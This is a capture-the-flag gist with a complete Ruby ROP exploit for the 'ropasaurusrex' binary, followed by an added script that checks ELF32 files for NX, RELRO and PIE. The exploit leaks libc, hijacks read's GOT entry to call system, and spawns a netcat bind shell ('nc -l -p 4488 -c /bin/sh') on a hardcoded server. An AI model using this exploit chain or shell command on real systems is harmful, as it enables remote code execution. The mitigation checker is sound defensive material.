@iagox86
Created April 22, 2013 16:45
```ruby
#!/usr/bin/ruby
require 'socket'

# Fixed addresses taken from the target binary: PLT stubs, a GOT entry and a gadget
read = 0x0804832C                 # read@plt
write = 0x0804830C                # write@plt
ptr_write = 0x08049614            # GOT entry holding the resolved address of write
pppr = 0x80484e4                  # pop; pop; pop; ret gadget (discards three arguments)
writable_data_section = 0x08049620
bytes_to_write = "nc -l -p 4488 -c /bin/sh\x00"
#bytes_to_write = "cat /home/ropasaurusrex/key\x00"
offset_execlp = 0x263a0 # offset from 'write' inside the target's libc
offset_system = 0x85d40 # offset from 'write' inside the target's libc
i = 0x08049614          # unused
addr = write            # first return address overwritten on the stack: write@plt
params = [
# Read the 4-byte address of 'write' so we can calculate execlp
pppr, # return address (pop pop pop ret)
1, # handle (stdout)
ptr_write, # buf
0x00000004, # length
# Return address for the pppr
read,
# Write "bytes_to_write" to "writable_data_section" (ie, write the command that will be passed to execlp)
pppr, # return address (pop pop pop ret)
0, # handle (stdin)
writable_data_section, # buffer
bytes_to_write.length, # length
# Return address for the pppr
write,
# Write "WIN" to the console to make sure things are working
pppr, # return address
1, # handle (stdout)
0x08048510, # buf
4, # length
# Return address for the pppr
read,
# Overwrite the GOT entry of 'read' with the 4-byte address of the function to call (system_address is sent below)
pppr, # return address
0, # handle (stdin)
0x0804961c, # buffer (GOT entry of 'read')
4,
read,         # read@plt now jumps through the overwritten GOT entry
0x48484848,   # return address after the call (junk)
writable_data_section,  # first argument: the command string written above
writable_data_section,  # extra arguments, only meaningful if execlp is the target
0
]
sploit = ''
sploit += ("A" * 140)         # padding up to the saved return address
sploit += [addr].pack("L")    # "L" is native 32-bit, little-endian on an x86 host
sploit += params.pack("L*")
#s = TCPSocket.new("localhost", 1025)
s = TCPSocket.new("54.234.151.114", 1025)
s.write(sploit)
write_address = s.read(4).unpack("L").pop
execlp_address = write_address - offset_execlp
system_address = write_address - offset_system
puts("execlp address: %x" % execlp_address)
puts("system address: %x" % system_address)
s.write(bytes_to_write) # write our data to a known address
s.write([system_address].pack("L")) # The function to call
puts(s.read(3))
#s.write("pwd")
puts(s.read())
#system("nc 54.234.151.114 1025 < file")
#system("./ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d < file")
```
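The chain above depends on two properties of the target build: the GOT entry of `read` sits at a fixed, writable address (so a 4-byte `read()` into it redirects the next `read@plt` call), and the stack can be overrun at a fixed 140-byte offset into the saved return address. The following Ruby script is an added example written for this page, not part of iagox86's gist or the CTF binary: it parses the ELF32 program headers of a file and reports the build-time mitigations relevant here, namely NX (a `PT_GNU_STACK` segment without `PF_X`), RELRO (a `PT_GNU_RELRO` segment covering the GOT) and PIE (`e_type == ET_DYN`). The `build_elf32` helper constructs a synthetic little-endian ELF32 image so the check runs offline; the two images it builds are constructed samples, not real binaries. The parser only supports ELFCLASS32 little-endian input.

```ruby
#!/usr/bin/ruby
# Added example (not from the original gist): report NX / RELRO / PIE
# from the program headers of an ELF32 little-endian image.

ET_DYN       = 3            # e_type of a position-independent executable
PT_GNU_STACK = 0x6474e551   # program header describing stack permissions
PT_GNU_RELRO = 0x6474e552   # region (GOT, .dynamic, ...) made read-only after relocation
PF_X         = 1            # execute bit in p_flags

# Parse an ELF32 LE image (String of bytes) and return a Hash of mitigation flags.
def elf32_mitigations(data)
  data = data.b
  raise ArgumentError, "not an ELF file" unless data[0, 4] == "\x7fELF".b
  raise ArgumentError, "only ELFCLASS32 supported" unless data.getbyte(4) == 1
  raise ArgumentError, "only little-endian supported" unless data.getbyte(5) == 1

  # ELF32 header layout: e_type @16, e_phoff @28, e_phentsize @42, e_phnum @44
  e_type  = data[16, 2].unpack1("v")
  e_phoff = data[28, 4].unpack1("V")
  e_phentsize, e_phnum = data[42, 4].unpack("vv")
  needed = e_phoff + e_phnum * e_phentsize
  raise ArgumentError, "truncated program header table" if data.bytesize < needed

  # No PT_GNU_STACK at all: the kernel historically grants an executable stack on i386,
  # so treat a missing entry as "NX off".
  nx, relro = false, false
  e_phnum.times do |idx|
    # Elf32_Phdr: p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align
    ph = data[e_phoff + idx * e_phentsize, e_phentsize].unpack("V8")
    p_type, p_flags = ph[0], ph[6]
    case p_type
    when PT_GNU_STACK then nx = (p_flags & PF_X) == 0
    when PT_GNU_RELRO then relro = true
    end
  end
  { pie: e_type == ET_DYN, nx: nx, relro: relro }
end

# Build a constructed ELF32 LE image holding only an ELF header and the given
# program headers ([[p_type, p_flags], ...]). Test input only, not a real binary.
def build_elf32(e_type, phdrs)
  ehdr_size, phent_size = 52, 32
  ident = "\x7fELF".b + [1, 1, 1, 0].pack("C4") + ("\x00" * 8).b  # class32, LE, v1, SysV ABI
  header = ident + [e_type, 3, 1, 0x08048000, ehdr_size, 0, 0,
                    ehdr_size, phent_size, phdrs.size, 40, 0, 0].pack("vvVVVVVvvvvvv")
  body = phdrs.map { |p_type, p_flags| [p_type, 0, 0, 0, 0, 0, p_flags, 4].pack("V8") }.join
  header + body
end

# Usage: ruby elf_mitigations.rb /path/to/binary ...
if __FILE__ == $0
  ARGV.each do |path|
    m = elf32_mitigations(File.binread(path))
    puts "#{path}: PIE=#{m[:pie]} NX=#{m[:nx]} RELRO=#{m[:relro]}"
  end
end
```

Two caveats on reading the output. `PT_GNU_RELRO` on its own only indicates partial RELRO; full RELRO, which makes the GOT read-only after loading and would make the 4-byte write into `0x0804961c` fault, additionally requires `BIND_NOW` in the dynamic section, which this example does not inspect. NX is what forces an attacker into return-oriented programming in the first place but does not by itself stop a chain built from existing PLT stubs and gadgets; PIE combined with system-level ASLR is what invalidates the hardcoded addresses at the top of the script.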